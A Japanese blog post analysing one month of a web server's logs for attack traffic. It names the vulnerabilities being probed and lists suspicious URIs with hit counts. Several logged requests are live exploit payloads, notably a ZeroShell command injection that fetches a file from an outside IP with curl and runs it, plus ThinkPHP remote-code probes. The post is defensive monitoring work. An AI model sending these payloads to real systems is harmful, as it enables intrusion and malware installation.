ITオムライス

webサーバのログの分析 6月分

2021-07-15 技術系

公開しているwebサーバのログから通常のアクセスではない通信について分析しました。

多かったリクエスト

PHPUnitの脆弱性

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php   

Wordpress関連

ログイン画面の調査

/wp-login.php
/wordpress/wp-login.php
/wp/wp-login.php 
/blog/wp-login.php 

WordPress 用プラグイン File Managerの脆弱性

WordPress 用プラグイン File Manager の脆弱性について

/wp-content/plugins/wp-file-manager/readme.txt

WordPress 用プラグイン Windows Live Writerの脆弱性

プラグインのWindows Live Writerの設定ファイルにアクセスを試みる通信が複数ありました。

//wp/wp-includes/wlwmanifest.xml 
//wp-includes/wlwmanifest.xml 
//wordpress/wp-includes/wlwmanifest.xml 
//cms/wp-includes/wlwmanifest.xml 
//site/wp-includes/wlwmanifest.xml
//blog/wp-includes/wlwmanifest.xml 

thinkPHPの脆弱性を利用した攻撃

/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21

ZeroShell の cgi-bin/kerbynet における任意のコマンドを実行される脆弱性

JVNDB-2009-005813 - JVN iPedia - 脆弱性対策情報データベース

/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22   

不審な通信の一覧

uri count
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 197
/.env 182
/ads.txt 162
/wp-login.php 117
/_ignition/execute-solution 113
/wp-content/plugins/wp-file-manager/readme.txt 85
/api/jsonws/invoke 85
/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 83
/console/ 83
/Autodiscover/Autodiscover.xml 80
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 76
/app-ads.txt 52
/owa/ 49
/solr/admin/info/system?wt=json 46
http://passport.baidu.com/ 40
/wordpress/wp-login.php 40
/wp/wp-login.php 39
/blog/wp-login.php 39
/mifs/.;/services/LogService 38
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f 30
/manager/html 28
/images/Nxrs4tAtO/HCw4_2FQ7o69dmQEodXU/_2Fua56jJgWqt8tN1Tx/0M9Tus5G1nAOe_2BJflcrm/2nz3T7AxG_2Fd/YnZ7Cn6A/zq1HlKYZhiFyQLgflmvIbb1/yQL2MK3UaK/00uQsiMnxrcs4C9gN/xpGuwRLuq6tH/7YwEr.avi 27
/system_api.php 26
mstshash=Administr 25
//a2billing/customer/templates/default/footer.tpl 25
/?a=fetch&content=die(@md5(HelloThinkCMF)) 24
/login 23
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 23
/boaform/admin/formLogin 23
/?XDEBUG_SESSION_START=phpstorm 23
* 23
/actuator/health 22
/GponForm/diag_Form?style/ 20
/jenkins/login 19
/config/getuser?index=0 19
/streaming/clients_live.php 18
/stream/live.php 18
/stalker_portal/c/version.js 18
/c/version.js 18
/clientaccesspolicy.xml 17
/.well-known/security.txt 15
/administrator/admin/index.php?lang=en 14
/_phpmyadmin/index.php?lang=en 14
//xmlrpc.php?rsd 14
//wp/wp-includes/wlwmanifest.xml 14
//wp-includes/wlwmanifest.xml 14
//wordpress/wp-includes/wlwmanifest.xml 14
//site/wp-includes/wlwmanifest.xml 14
//cms/wp-includes/wlwmanifest.xml 14
//blog/wp-includes/wlwmanifest.xml 14
/sql/php-myadmin/index.php?lang=en 13
/invoker/readonly 13
/admin.php 13
/GponForm/diag_Form?images/ 13
/.git/config 13
/wp-includes/js/jquery/jquery.js 12
/vendor/phpunit/phpunit/build.xml 12
/tags 12
/shopdb/index.php?lang=en 12
/plugins/system/debug/debug.xml 12
/mysql/dbadmin/index.php?lang=en 12
/misc/ajax.js 12
/js/header-rollup-554.js 12
/images/editor/separator.gif 12
/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media 12
/db/websql/index.php?lang=en 12
/administrator/language/en-GB/install.xml 12
/administrator/help/en-GB/toc.json 12
/administrator/db/index.php?lang=en 12
/administrator/ 12
/admin/view/javascript/common.js 12
/admin/includes/general.js 12
/admin/config.php 12
/PMA2013/index.php?lang=en 12
/HNAP1/ 12
/0bef 12
//wp2/wp-includes/wlwmanifest.xml 12
//wp1/wp-includes/wlwmanifest.xml 12
//website/wp-includes/wlwmanifest.xml 12
//web/wp-includes/wlwmanifest.xml 12
//test/wp-includes/wlwmanifest.xml 12
//sito/wp-includes/wlwmanifest.xml 12
//shop/wp-includes/wlwmanifest.xml 12
//news/wp-includes/wlwmanifest.xml 12
//2019/wp-includes/wlwmanifest.xml 12
/test.php 11
/sql/phpMyAdmin2/index.php?lang=en 11
/phpmyadmin2020/index.php?lang=en 11
/phpMyAdmin4/index.php?lang=en 11
/mysql/web/index.php?lang=en 11
/bag2 11
/_phpMyAdmin/index.php?lang=en 11
/PMA/index.php?lang=en 11
/sqlmanager/index.php?lang=en 10
/sql/sql/index.php?lang=en 10
/sitemap.xml 10
/phppma/index.php?lang=en 10
/phpmyadmin2015/index.php?lang=en 10
/phpmyadmin2014/index.php?lang=en 10
/phpmy/index.php?lang=en 10
/favicon.png 10
/dns-query?dns=KhUBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE 10
/admin/web/index.php?lang=en 10
/admin/sqladmin/index.php?lang=en 10
/Telerik.Web.UI.WebResource.axd?type=rau 10
/PMA2014/index.php?lang=en 10
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 10
/tot43/DESKTOP-JGLLJLF_W10016299.1CF3DD28B304BBF734B33FBDF1762BBE/83/ 9
/pma2015/index.php?lang=en 9
/phpmyadmin5/index.php?lang=en 9
/phpmyadmin2013/index.php?lang=en 9
/phpMyAdmin_/index.php?lang=en 9
/phpMyAdmin2/index.php?lang=en 9
/phpMyAdmin-3/index.php?lang=en 9
/mysqladmin/index.php?lang=en 9
/mysql-admin/index.php?lang=en 9
/myadmin/index.php?lang=en 9
/db/phpMyAdmin/index.php?lang=en 9
/db/dbadmin/index.php?lang=en 9
/administrator/PMA/index.php?lang=en 9
/stalker_portal/c/ 8
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ 8
/sql/websql/index.php?lang=en 8
/sql/phpMyAdmin/index.php?lang=en 8
/solr/ 8
/pma2019/index.php?lang=en 8
/pma2016/index.php?lang=en 8
/pma2011/index.php?lang=en 8
/phpmyadmin2018/index.php?lang=en 8
/phpMyAdmin5/index.php?lang=en 8
/phpMyAdmin3/index.php?lang=en 8
/php-my-admin/index.php?lang=en 8
/mysql/sqlmanager/index.php?lang=en 8
/mysql/db/index.php?lang=en 8
/mysql/admin/index.php?lang=en 8
/db/webadmin/index.php?lang=en 8
/db/phpmyadmin3/index.php?lang=en 8
/data/admin/allowurl.txt 8
/client_area/ 8
/2phpmyadmin/index.php?lang=en 8
/1.php 8
/tags/visual-studio-code 7
/tags/hugo 7
/sql/sqlweb/index.php?lang=en 7
/shell.php 7
/public/.env 7